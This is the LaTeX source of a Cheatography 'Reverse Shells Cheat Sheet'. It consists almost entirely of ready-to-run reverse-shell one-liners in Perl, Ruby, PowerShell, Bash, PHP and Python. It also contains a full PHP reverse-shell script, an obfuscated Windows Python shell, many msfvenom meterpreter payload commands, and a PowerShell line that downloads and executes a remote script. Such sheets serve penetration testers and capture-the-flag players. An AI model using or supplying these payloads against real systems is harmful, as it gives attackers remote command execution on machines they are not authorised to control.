\documentclass[10pt,a4paper]{article}

% Packages
\usepackage{fancyhdr}           % For header and footer
\usepackage{multicol}           % Allows multicols in tables
\usepackage{tabularx}           % Intelligent column widths
\usepackage{tabulary}           % Used in header and footer
\usepackage{hhline}             % Border under tables
\usepackage{graphicx}           % For images
\usepackage{xcolor}             % For hex colours
%\usepackage[utf8x]{inputenc}    % For unicode character support
\usepackage[T1]{fontenc}        % Without this we get weird character replacements
\usepackage{colortbl}           % For coloured tables
\usepackage{setspace}           % For line height
\usepackage{lastpage}           % Needed for total page number
\usepackage{seqsplit}           % Splits long words.
%\usepackage{opensans}          % Can't make this work so far. Shame. Would be lovely.
\usepackage[normalem]{ulem}     % For underlining links
% Most of the following are not required for the majority
% of cheat sheets but are needed for some symbol support.
\usepackage{amsmath}            % Symbols
\usepackage{MnSymbol}           % Symbols
\usepackage{wasysym}            % Symbols
%\usepackage[english,german,french,spanish,italian]{babel}              % Languages

% Document Info
\author{pat0pau}
\pdfinfo{
  /Title (reverse-shells.pdf)
  /Creator (Cheatography)
  /Author (pat0pau)
  /Subject (Reverse Shells Cheat Sheet)
}

% Lengths and widths
\addtolength{\textwidth}{6cm}
\addtolength{\textheight}{-1cm}
\addtolength{\hoffset}{-3cm}
\addtolength{\voffset}{-2cm}
\setlength{\tabcolsep}{0.2cm} % Space between columns
\setlength{\headsep}{-12pt} % Reduce space between header and content
\setlength{\headheight}{85pt} % If less, LaTeX automatically increases it
\renewcommand{\footrulewidth}{0pt} % Remove footer line
\renewcommand{\headrulewidth}{0pt} % Remove header line
\renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit
% This two commands together give roughly
% the right line height in the tables
\renewcommand{\arraystretch}{1.3}
\onehalfspacing

% Commands
\newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour
\newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols
\newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns
\newcommand{\tn}{\tabularnewline} % Required as custom column type in use

% Font and Colours
\definecolor{HeadBackground}{HTML}{333333}
\definecolor{FootBackground}{HTML}{666666}
\definecolor{TextColor}{HTML}{333333}
\definecolor{DarkBackground}{HTML}{5360A3}
\definecolor{LightBackground}{HTML}{F4F5F9}
\renewcommand{\familydefault}{\sfdefault}
\color{TextColor}

% Header and Footer
\pagestyle{fancy}
\fancyhead{} % Set header to blank
\fancyfoot{} % Set footer to blank
\fancyhead[L]{
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{C}
    \SetRowColor{DarkBackground}
    \vspace{-7pt}
    {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent
        \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}}
    }
\end{tabulary}
\columnbreak
\begin{tabulary}{11cm}{L}
    \vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{Reverse Shells Cheat Sheet}}}} \\
    \normalsize{by \textcolor{DarkBackground}{pat0pau} via \textcolor{DarkBackground}{\uline{cheatography.com/122827/cs/22977/}}}
\end{tabulary}
\end{multicols}}

\fancyfoot[L]{ \footnotesize
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{LL}
  \SetRowColor{FootBackground}
  \mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}}  \\
  \vspace{-2pt}pat0pau \\
  \uline{cheatography.com/pat0pau} \\
  \end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
  \SetRowColor{FootBackground}
  \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}}  \\
   \vspace{-2pt}Not Yet Published.\\
   Updated 24th May, 2020.\\
   Page {\thepage} of \pageref{LastPage}.
\end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
  \SetRowColor{FootBackground}
  \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}}  \\
  \SetRowColor{white}
  \vspace{-5pt}
  %\includegraphics[width=48px,height=48px]{dave.jpeg}
  Measure your website readability!\\
  www.readability-score.com
\end{tabulary}
\end{multicols}}




\begin{document}
\raggedright
\raggedcolumns

% Set font size to small. Switch to any value
% from this page to resize cheat sheet text:
% www.emerson.emory.edu/services/latex/latex_169.html
\footnotesize % Small font.

\begin{multicols*}{2}

\begin{tabularx}{8.4cm}{x{3.28 cm} x{4.72 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Misc}}  \tn
% Row 0
\SetRowColor{LightBackground}
What programs are installed? & for item in \$(echo "nmap nc perl python ruby gcc wget sudo curl"); do which \$item; done` \tn 
% Row Count 4 (+ 4)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Perl}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{perl -e 'use \seqsplit{Socket;\$i="10.0.0.1";\$p=4242;socket(S},PF\_INET,SOCK\_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr\_in(\$p,inet\_aton(\$i))))\{open(STDIN,"\textgreater{}\&S");open(STDOUT,"\textgreater{}\&S");open(STDERR,"\textgreater{}\&S");exec("/bin/sh -i");\};'} \tn 
% Row Count 5 (+ 5)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{perl -MIO -e '\$p=fork;exit,if(\$p);\$c=new \seqsplit{IO::Socket::INET(PeerAddr},"10.0.0.1:4242");STDIN-\textgreater{}fdopen(\$c,r);\$\textasciitilde{}-\textgreater{}fdopen(\$c,w);system\$\_ while\textless{}\textgreater{};'} \tn 
% Row Count 8 (+ 3)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{perl -MIO -e '\$c=new \seqsplit{IO::Socket::INET(PeerAddr},"10.0.0.1:4242");STDIN-\textgreater{}fdopen(\$c,r);\$\textasciitilde{}-\textgreater{}fdopen(\$c,w);system\$\_ while\textless{}\textgreater{};'} \tn 
% Row Count 11 (+ 3)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{ruby}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{ruby -rsocket \seqsplit{-e'f=TCPSocket.open("127.0.0.1"}, 1337).to\_i;exec sprintf("/bin/sh -i \textless{}\&\%d \textgreater{}\&\%d 2\textgreater{}\&\%d",f,f,f)'} \tn 
% Row Count 3 (+ 3)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{ruby -rsocket -e 'exit if \seqsplit{fork;c=TCPSocket.new("10.0.0.1"},"4242");while(cmd=c.gets);IO.popen(cmd,"r")\{|io|c.print io.read\}end'} \tn 
% Row Count 6 (+ 3)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{ruby -rsocket -e \seqsplit{'c=TCPSocket.new("10.0.0.1"},"4242");while(cmd=c.gets);IO.popen(cmd,"r")\{|io|c.print io.read\}end'} \tn 
% Row Count 9 (+ 3)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{powershell}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{\$client = New-Object \seqsplit{System.Net.Sockets.TCPClient("127.0.0.1"},8000);\$stream = \$client.GetStream();{[}byte{[}{]}{]}\$bytes = 0..65535|\%\{0\};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0)\{;\$data = (New-Object -TypeName \seqsplit{System.Text.ASCIIEncoding).GetString(\$bytes},0, \$i);\$sendback = (iex \$data 2\textgreater{}\&1 | Out-String );\$sendback2 = \$sendback + "PS " + (pwd).Path + "\textgreater{} ";\$sendbyte = ({[}text.encoding{]}::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()\};\$client.Close()} \tn 
% Row Count 10 (+ 10)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{powershell -nop -c "\$client = New-Object \seqsplit{System.Net.Sockets.TCPClient('127.0.0.1'},1337);\$stream = \$client.GetStream();{[}byte{[}{]}{]}\$bytes = 0..65535|\%\{0\};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0)\{;\$data = (New-Object -TypeName \seqsplit{System.Text.ASCIIEncoding).GetString(\$bytes},0, \$i);\$sendback = (iex \$data 2\textgreater{}\&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '\textgreater{} ';\$sendbyte = ({[}text.encoding{]}::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()\};\$client.Close()"} \tn 
% Row Count 21 (+ 11)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{powershell IEX (New-Object \seqsplit{Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')}} \tn 
% Row Count 25 (+ 4)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{war file}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{msfvenom -p \seqsplit{java/jsp\_shell\_reverse\_tcp} LHOST=10.0.0.1 LPORT=4242 -f war \textgreater{} reverse.war} \tn 
% Row Count 2 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Bash}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{exec 5\textless{}\textgreater{}/dev/tcp/127.0.0.1/1337  cat \textless{}\&5 | while read line; do \$line 2\textgreater{}\&5 \textgreater{}\&5; done} \tn 
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{bash -i \textgreater{}\& /dev/tcp/127.0.0.1/1337 0\textgreater{}\&1} \tn 
% Row Count 3 (+ 1)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{0\textless{}\&196;exec 196\textless{}\textgreater{}/dev/tcp/10.0.0.1/4242; sh \textless{}\&196 \textgreater{}\&196 2\textgreater{}\&196} \tn 
% Row Count 5 (+ 2)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{sh -i \textgreater{}\& /dev/udp/10.0.0.1/4242 0\textgreater{}\&1} \tn 
% Row Count 6 (+ 1)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{php}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{php -r \seqsplit{'\$sock=fsockopen("127.0.0.1"},1337);exec("/bin/sh -i \textless{}\&3 \textgreater{}\&3 2\textgreater{}\&3");'} \tn 
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{\textless{}?php \seqsplit{set\_time\_limit(0);\$VERSION="1}.0";\$ip='127.0.0.1';\$port=1337;\$chunk\_size=1400;\$write\_a=null;\$error\_a=null;\$shell='uname -a; w; id; /bin/sh -i';\$daemon=0;\$debug=0;if(function\_exists('pcntl\_fork'))\{\$pid=pcntl\_fork();if(\$pid==-1)\{printit("ERROR: Can't fork");exit(1);\}if(\$pid)\{exit(0);\}if(posix\_setsid()==-1)\{printit("Error: Can't setsid()");exit(1);\}\$daemon=1;\}else \{printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");\}chdir("/");umask(0);\$sock=fsockopen(\$ip,\$port,\$errno,\$errstr,30);if(!\$sock)\{printit("\$errstr (\$errno)");exit(1);\}\$descriptorspec=array(0=\textgreater{}array("pipe","r"),1=\textgreater{}array("pipe","w"),2=\textgreater{}array("pipe","w"));\$process=proc\_open(\$shell,\$descriptorspec,\$pipes);if(!is\_resource(\$process))\{printit("ERROR: Can't spawn shell");exit(1);\}stream\_set\_blocking(\$pipes{[}0{]},0);stream\_set\_blocking(\$pipes{[}1{]},0);stream\_set\_blocking(\$pipes{[}2{]},0);stream\_set\_blocking(\$sock,0);printit("Successfully opened reverse shell to \$ip:\$port");while(1)\{if(feof(\$sock))\{printit("ERROR: Shell connection terminated");break;\}if(feof(\$pipes{[}1{]}))\{printit("ERROR: Shell process terminated");break;\}\$read\_a=array(\$sock,\$pipes{[}1{]},\$pipes{[}2{]});\$num\_changed\_sockets=stream\_select(\$read\_a,\$write\_a,\$error\_a,null);if(in\_array(\$sock,\$read\_a))\{if(\$debug)printit("SOCK \seqsplit{READ");\$input=fread(\$sock},\$chunk\_size);if(\$debug)printit("SOCK: \$input");fwrite(\$pipes{[}0{]},\$input);\}if(in\_array(\$pipes{[}1{]},\$read\_a))\{if(\$debug)printit("STDOUT READ");\$input=fread(\$pipes{[}1{]},\$chunk\_size);if(\$debug)printit("STDOUT: \$input");fwrite(\$sock,\$input);\}if(in\_array(\$pipes{[}2{]},\$read\_a))\{if(\$debug)printit("STDERR READ");\$input=fread(\$pipes{[}2{]},\$chunk\_size);if(\$debug)printit("STDERR: \$input");fwrite(\$sock,\$input);\}\}fclose(\$sock);fclose(\$pipes{[}0{]});fclose(\$pipes{[}1{]});fclose(\$pipes{[}2{]});proc\_close(\$process);function printit(\$string)\{if(!\$daemon)\{print"\$string\textbackslash{}n";\}\}?\textgreater{}} \tn 
% Row Count 39 (+ 37)
\end{tabularx}
\par\addvspace{1.3em}

\vfill
\columnbreak
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{php (cont)}}  \tn
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{php -r \seqsplit{'\$sock=fsockopen("10.0.0.1"},4242);\$proc=proc\_open("/bin/sh -i", array(0=\textgreater{}\$sock, 1=\textgreater{}\$sock, 2=\textgreater{}\$sock),\$pipes);'} \tn 
% Row Count 3 (+ 3)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{meterpreter}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{msfvenom -p \seqsplit{windows/meterpreter/reverse\_tcp} LHOST=10.0.0.1 LPORT=4242 -f exe \textgreater{} reverse.exe} \tn 
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{msfvenom -p \seqsplit{windows/shell\_reverse\_tcp} LHOST=10.0.0.1 LPORT=4242 -f exe \textgreater{} reverse.exe} \tn 
% Row Count 4 (+ 2)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{msfvenom -p \seqsplit{linux/x86/meterpreter/reverse\_tcp} LHOST=10.0.0.1 LPORT=4242 -f elf \textgreater{}reverse.elf} \tn 
% Row Count 6 (+ 2)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{msfvenom -p \seqsplit{linux/x86/shell\_reverse\_tcp} LHOST=10.0.0.1 LPORT=4242 -f elf \textgreater{}reverse.elf} \tn 
% Row Count 8 (+ 2)
% Row 4
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{\$ msfvenom -p \seqsplit{linux/x86/meterpreter/reverse\_tcp} LHOST="10.0.0.1" LPORT=4242 -f elf \textgreater{} shell.elf} \tn 
% Row Count 10 (+ 2)
% Row 5
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{\$ msfvenom -p \seqsplit{windows/meterpreter/reverse\_tcp} LHOST="10.0.0.1" LPORT=4242 -f exe \textgreater{} shell.exe} \tn 
% Row Count 12 (+ 2)
% Row 6
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{\$ msfvenom -p \seqsplit{osx/x86/shell\_reverse\_tcp} LHOST="10.0.0.1" LPORT=4242 -f macho \textgreater{} shell.macho} \tn 
% Row Count 14 (+ 2)
% Row 7
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{\$ msfvenom -p \seqsplit{windows/meterpreter/reverse\_tcp} LHOST="10.0.0.1" LPORT=4242 -f asp \textgreater{} shell.asp} \tn 
% Row Count 16 (+ 2)
% Row 8
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{\$ msfvenom -p \seqsplit{java/jsp\_shell\_reverse\_tcp} LHOST="10.0.0.1" LPORT=4242 -f raw \textgreater{} shell.jsp} \tn 
% Row Count 18 (+ 2)
% Row 9
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{\$ msfvenom -p \seqsplit{java/jsp\_shell\_reverse\_tcp} LHOST="10.0.0.1" LPORT=4242 -f war \textgreater{} shell.war} \tn 
% Row Count 20 (+ 2)
% Row 10
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{\$ msfvenom -p cmd/unix/reverse\_python LHOST="10.0.0.1" LPORT=4242 -f raw \textgreater{} shell.py} \tn 
% Row Count 22 (+ 2)
% Row 11
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{\$ msfvenom -p cmd/unix/reverse\_bash LHOST="10.0.0.1" LPORT=4242 -f raw \textgreater{} shell.sh} \tn 
% Row Count 24 (+ 2)
% Row 12
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{\$ msfvenom -p cmd/unix/reverse\_perl LHOST="10.0.0.1" LPORT=4242 -f raw \textgreater{} shell.pl} \tn 
% Row Count 26 (+ 2)
% Row 13
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{\$ msfvenom -p \seqsplit{php/meterpreter\_reverse\_tcp} LHOST="10.0.0.1" LPORT=4242 -f raw \textgreater{} shell.php; cat shell.php | pbcopy \&\& echo '\textless{}?php ' | tr -d '\textbackslash{}n' \textgreater{} shell.php \&\& pbpaste \textgreater{}\textgreater{} shell.php} \tn 
% Row Count 30 (+ 4)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Python}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect(("127.0.0.1",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call({[}"/bin/sh","-i"{]});'} \tn 
% Row Count 5 (+ 5)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{export RHOST="10.0.0.1";export RPORT=4242;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));{[}os.dup2(s.fileno(),fd) for fd in (0,1,2){]};pty.spawn("/bin/sh")'} \tn 
% Row Count 10 (+ 5)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'} \tn 
% Row Count 15 (+ 5)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF\_INET6,socket.SOCK\_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'} \tn 
% Row Count 20 (+ 5)
% Row 4
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{C:\textbackslash{}Python27\textbackslash{}python.exe -c "(lambda \_\_y, \_\_g, \_\_contextlib: {[}{[}{[}{[}{[}{[}{[}(s.connect(('10.0.0.1', 4242)), {[}{[}{[}(s2p\_thread.start(), {[}{[}(p2s\_thread.start(), (lambda \_\_out: (lambda \_\_ctx: {[}\_\_ctx.\_\_enter\_\_(), \seqsplit{\_\_ctx.\_\_exit\_\_(None}, None, None), \_\_out{[}0{]}(lambda: None){]}{[}2{]})(\_\_contextlib.nested(type('except', (), \{'\_\_enter\_\_': lambda self: None, '\_\_exit\_\_': lambda \_\_self, \_\_exctype, \_\_value, \_\_traceback: \_\_exctype is not None and (issubclass(\_\_exctype, KeyboardInterrupt) and {[}True for \_\_out{[}0{]} in {[}((s.close(), lambda after: after()){[}1{]}){]}{]}{[}0{]})\})(), type('try', (), \{'\_\_enter\_\_': lambda self: None, '\_\_exit\_\_': lambda \_\_self, \_\_exctype, \_\_value, \_\_traceback: {[}False for \_\_out{[}0{]} in {[}((p.wait(), (lambda \_\_after: \_\_after())){[}1{]}){]}{]}{[}0{]}\})())))({[}None{]})){[}1{]} for p2s\_thread.daemon in {[}(True){]}{]}{[}0{]} for \_\_g{[}'p2s\_thread'{]} in {[}(threading.Thread(target=p2s, args={[}s, p{]})){]}{]}{[}0{]}){[}1{]} for s2p\_thread.daemon in {[}(True){]}{]}{[}0{]} for \_\_g{[}'s2p\_thread'{]} in {[}(threading.Thread(target=s2p, args={[}s, p{]})){]}{]}{[}0{]} for \_\_g{[}'p'{]} in {[}(subprocess.Popen({[}'\textbackslash{}\textbackslash{}windows\textbackslash{}\textbackslash{}system32\textbackslash{}\textbackslash{}cmd.exe'{]}, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)){]}{]}{[}0{]}){[}1{]} for \_\_g{[}'s'{]} in {[}(socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)){]}{]}{[}0{]} for \_\_g{[}'p2s'{]}, p2s.\_\_name\_\_ in {[}(lambda s, p: (lambda \_\_l: {[}(lambda \_\_after: \_\_y(lambda \_\_this: lambda: (\_\_l{[}'s'{]}.send(\_\_l{[}'p'{]}.stdout.read(1)), \_\_this()){[}1{]} if True else \_\_after())())(lambda: None) for \_\_l{[}'s'{]}, \_\_l{[}'p'{]} in {[}(s, p){]}{]}{[}0{]})(\{\}), 'p2s'){]}{]}{[}0{]} for \_\_g{[}'s2p'{]}, s2p.\_\_name\_\_ in {[}(lambda s, p: (lambda \_\_l: {[}(lambda \_\_after: \_\_y(lambda \_\_this: lambda: {[}(lambda \_\_after: (\_\_l{[}'p'{]}.stdin.write(\_\_l{[}'data'{]}), \_\_after()){[}1{]} if (len(\_\_l{[}'data'{]}) \textgreater{} 0) else \_\_after())(lambda: \_\_this()) for \_\_l{[}'data'{]} in {[}(\_\_l{[}'s'{]}.recv(1024)){]}{]}{[}0{]} if True else \_\_after())())(lambda: None) for \_\_l{[}'s'{]}, \_\_l{[}'p'{]} in {[}(s, p){]}{]}{[}0{]})(\{\}), 's2p'){]}{]}{[}0{]} for \_\_g{[}'os'{]} in {[}(\_\_import\_\_('os', \_\_g, \_\_g)){]}{]}{[}0{]} for \_\_g{[}'socket'{]} in {[}(\_\_import\_\_('socket', \_\_g, \_\_g)){]}{]}{[}0{]} for \_\_g{[}'subprocess'{]} in {[}(\_\_import\_\_('subprocess', \_\_g, \_\_g)){]}{]}{[}0{]} for \_\_g{[}'threading'{]} in {[}(\_\_import\_\_('threading', \_\_g, \_\_g)){]}{]}{[}0{]})((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), \seqsplit{\_\_import\_\_('contextlib'))"}} \tn 
% Row Count 64 (+ 44)
\end{tabularx}
\par\addvspace{1.3em}

\vfill
\columnbreak
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Python (cont)}}  \tn
% Row 5
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call({[}"/bin/sh","-i"{]});'} \tn 
% Row Count 5 (+ 5)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}


% That's all folks
\end{multicols*}

\end{document}